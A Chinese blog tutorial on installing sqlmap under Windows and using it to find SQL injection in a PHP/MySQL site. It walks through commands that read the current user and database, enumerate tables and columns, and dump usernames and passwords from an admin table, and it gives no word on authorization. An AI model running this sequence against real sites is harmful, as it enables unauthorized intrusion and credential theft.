利用sqlmap进行php+mysql注入（windows环境）

老威SEO前段时间研究了一下sqlmap，其作为一款自动化的sql注入渗透工具，注入方式、注入成功后的取数据等等都是自动化的，非常适合我们这些小白前期玩玩渗透玩玩安全，它是用python写的，因此需要先安装python环境，一般都是傻瓜式安装操作

一、sqlmap的安装

1.python下载地址：

https://www.python.org/downloads/

2.sqlmap下载地址：

http://sqlmap.org/

把下载的sqlmap压缩包解压到文件夹sqlmap中，并将其复制粘贴到 “C:\Python27” 目录下（注：Python27为python安装文件夹）

在桌面新建一个cmd的快捷方式，将其命名为“SQLMap”，并键入对象位置为：cmd，快捷方式名称：SQLMap

双击刚才创建的快捷方式，输入sqlmap.py -h，出现如下信息则表示安装成功。 

二、sqlmap的常用命令

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193"  检测注入

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-user   获取当前用户  laowei@localhost

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --current-db 获取当前数据库 如为db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" --tables -D db_inis

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables  获取当前数据库下所有表 如表为3

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user   获取表3下的所有字段 如字段为4,5,6

sqlmap.py -u "http://www.lwseo.cn/xxxx.php?id=1193" -D db_inis --tables --columns -T wd_admin_user -C pwd,username --dump   注入完成

最后：此文章还待更新中……请持续关注